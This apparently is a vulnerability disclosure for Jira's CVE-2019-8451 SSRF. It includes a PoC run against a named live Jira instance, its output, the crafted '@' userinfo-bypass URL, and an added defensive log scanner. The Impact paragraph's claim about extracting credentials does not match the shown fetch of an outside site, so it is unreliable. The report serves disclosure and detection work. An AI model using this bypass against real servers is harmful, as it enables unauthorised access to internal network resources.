Hi Security Team,

Summary

The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.

CVE-2019-8451 is a pre-authentication server side request forgery (SSRF) vulnerability found in the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal network resources. The vulnerability was first introduced in Jira Core and Jira Software version 7.6.0, an enterprise release in November 2017, and affects Jira Core and Software versions from 7.6.0 through 8.3.4.

Steps To Reproduce:

1. Target is https://issues.jenkins-ci.org/, which uses Atlassian Jira Project Management Software (v7.13.6).
2. Let's rock!

    wayc0de@DESKTOP-9C0TVKV:~/tools/CVE-2019-8451$ python CVE-2019-8451.py https://issues.jenkins-ci.org

Result:

    >>>>SSRF URL: www.baidu.com
    >>>>Send poc Success!
    X-AUSERNAME= anonymous
    >>>>vuln_url= https://issues.jenkins-ci.org/plugins/servlet/gadgets/makeRequest?url=https://issues.jen...@www.baidu.com
    throw 1; < don't be evil' >{"https://issues.jen...@www.baidu.com":{"rc":200,"headers":{"set-cookie":["BDORZ=27315; max-age=86400; domain=.baidu.com; path=/"]},"body":"<!DOCTYPE html>\r\n<!-STATUS OK-><html> <head><meta http-equiv=content-type content=text/html;charset=utf-8><meta http-equiv=X-UA-Compatible content=IE=Edge><meta content=always name=referrer><link rel=stylesheet type=text/css href=https://ss1.bdstatic.com/5eN1bjq8AAUYm2zgoY3K/r/www/cache/bdorz/baidu.min.css><title>百度一下,你就知道<\/title><\/head> <body link=#0000cc> <div id=wrapper> <div id=head> <div class=head_wrapper> <div class=s_form> <div class=s_form_wrapper> <div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> <\/div> <form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class=\"bg s_ipt_wr\"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus=autofocus><\/span><span class=\"bg s_btn_wr\"><input type=submit id=su value=百度一下 class=\"bg s_btn\" autofocus><\/span> <\/form> <\/div> <\/div> <div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>新闻<\/a> <a href=https://www.hao123.com name=tj_trhao123 class=mnav>hao123<\/a> <a href=http://map.baidu.com name=tj_trmap class=mnav>地图<\/a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>视频<\/a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>贴吧<\/a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>登 录<\/a> <\/noscript> <script>document.write('<a href=\"http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === \"\" ? \"?\" : \"&\")+ \"bdorz_come=1\")+ '\" name=\"tj_login\" class=\"lb\">登录<\/a>');\r\n <\/script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style=\"display: block;\">更多产品<\/a> <\/div> <\/div> <\/div> <div id=ftCon> <div id=ftConw> <p id=lh> <a href=http://home.baidu.com>关于百度<\/a> <a href=http://ir.baidu.com>About Baidu<\/a> <\/p> <p id=cp>©2017 Baidu <a href=http://www.baidu.com/duty/>使用百度前必读<\/a> <a href=http://jianyi.baidu.com/ class=cp-feedback>意见反馈<\/a> 京ICP证030173号 <img src=//www.baidu.com/img/gs.gif> <\/p> <\/div> <\/div> <\/div> <\/body> <\/html>\r\n"}}

As you can see in the response: <title>百度一下,你就知道<\/title>

Reference

1. https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
2. https://jira.atlassian.com/browse/JRASERVER-69793

Impact:

An SSRF can provide attackers with the ability to query the cloud provider’s APIs, enumerating permissions and extracting data or executing API commands for other cloud services. Our example above simply aims to get the security credentials from the environment.
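The vuln_url in the report shows the shape of the bypass: the trusted Jira hostname sits before an `@` in the authority, so a naive prefix check passes while the request actually goes to the host after the `@`. The following detector, added here as an example and not part of the report or of Jira, scans constructed access-log lines for makeRequest calls and separates same-host requests from this userinfo-confusion pattern and from other off-host targets; JIRA_HOST is assumed to be the instance's own hostname.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hostname the whitelist is meant to allow (assumed; taken from the report's target)
# and the endpoint named in the report.
JIRA_HOST = "issues.jenkins-ci.org"
MAKEREQUEST_PATH = "/plugins/servlet/gadgets/makeRequest"

# Constructed access-log lines (not real traffic), combined log format.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Sep/2019:10:00:01 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https%3A%2F%2Fissues.jenkins-ci.org%2Frest%2Fapi%2F2%2Fmyself HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Sep/2019:10:00:02 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=https://issues.jenkins-ci.org@www.baidu.com HTTP/1.1" 200 2278',
    '203.0.113.7 - - [20/Sep/2019:10:00:03 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http://10.0.0.5:8080/status HTTP/1.1" 200 88',
    '203.0.113.7 - - [20/Sep/2019:10:00:04 +0000] "GET /browse/JENKINS-1 HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify_target(url):
    """Decide whether a makeRequest `url` value stays on the Jira host itself.

    urlsplit() treats everything before the last '@' of the authority as
    userinfo, so the host the server really connects to is .hostname, not the
    trusted-looking name that precedes the '@'.
    """
    if not url:
        return "missing-url", ""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    userinfo, sep, _ = parts.netloc.rpartition("@")
    if host == JIRA_HOST and not sep:
        return "allowed", host
    if sep and JIRA_HOST in userinfo.lower():
        # Trusted name appears only as userinfo: the '@' confusion pattern.
        return "ssrf-userinfo-bypass", host
    return "ssrf-external-host", host

def scan_access_log(lines):
    """Return (verdict, real_host, raw_url) for every makeRequest call seen."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        req = urlsplit(m.group(1))
        if req.path != MAKEREQUEST_PATH:
            continue
        url = parse_qs(req.query).get("url", [""])[0]  # parse_qs percent-decodes
        verdict, host = classify_target(url)
        findings.append((verdict, host, url))
    return findings

if __name__ == "__main__":
    for verdict, host, url in scan_access_log(SAMPLE_LOG):
        print(f"{verdict:22} host={host:25} url={url}")
```

Checking `.hostname` rather than a string prefix is also the right shape for the allow-list itself: the decision must be made on the host the server will actually connect to.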